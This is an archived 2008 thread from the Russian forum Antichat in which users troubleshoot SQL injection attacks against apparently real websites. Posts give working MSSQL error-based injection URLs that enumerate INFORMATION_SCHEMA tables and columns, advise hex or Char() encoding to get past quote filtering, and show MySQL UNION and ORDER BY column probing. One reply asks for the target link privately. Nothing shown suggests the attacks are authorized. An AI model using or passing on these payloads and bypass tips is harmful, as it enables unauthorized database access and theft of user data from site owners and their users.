ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.07.2008, 19:41
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
MaSTeR GэN, ttp://www.xakep.ru/magazine/xa/111/056/1.asp
|
|
|
16.07.2008, 20:18
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
2n0ne thx  |
|
|
|
16.07.2008, 22:31
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
С этого момента любой оффтоп в этой теме будет наказыватся отрицательной репутацией. Тема называется ваши вопросы по уязвимостям, а не "нераскрученные скули" или "продайте сплойт". О чем стоит говорить в этой теме сказано в корневом сообщении, это последние китайское предупреждение
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
17.07.2008, 05:47
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 159
Провел на форуме:
912928
Репутация:
137
|
|
в mssql узнал первую таблицу: content_meta_tbl, пытаюсь узнать другие:
Код:
http://www.site.ru/students/content.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('content_meta_tbl'))--
пишет
Incorrect syntax near 'content_meta_tbl'.
Поптыка узнать ячейки из этой таблица закончились также  |
|
|
|
17.07.2008, 06:48
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
zavra
content.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FRO M+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+I N+(SELECT+TOP+2+TABLE_NAME+FROM+INFORMATION_SCHEMA .TABLES))--
перебирай второй TOP 1,2,3,4.....
|
|
|
|
17.07.2008, 22:27
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 159
Провел на форуме:
912928
Репутация:
137
|
|
Код:
content.asp?id=1+or+1=(SELECT+TOP+2+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users')--
Incorrect syntax near 'users'.
что неправильного-то в синтаксисе?( |
|
|
|
17.07.2008, 22:47
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Ковычки фильтрует, в hex загони users
|
|
|
|
17.07.2008, 23:17
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
можно в Char()
|
|
|
|
18.07.2008, 03:36
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.site.org/article.php?id=80+or+1=(SELECT+TABLE_NAME+FROM+INF ORMATION_SCHEMA.TABLES+LIMIT+1,1)--
При подстановке любого числа в лимит выдаёт одну и ту же страницу.
http://www.site.org/article.php?id=80+order+by+4
Полей *якобы* 4.
http://www.site.org/article.php?id=80+union+select+1,2,3,4
The used SELECT statements have a different number of columns
Пробывал по всякому,но ничего не вышло.Версия пятая,mysql точно,ибо в ответе сказано,что это mysql.Комменты /* не принимает,что меня,кстати,удивило.(Приним ает только -- )
|
|
|
|
18.07.2008, 03:41
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
ссылку кинь в пм )
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид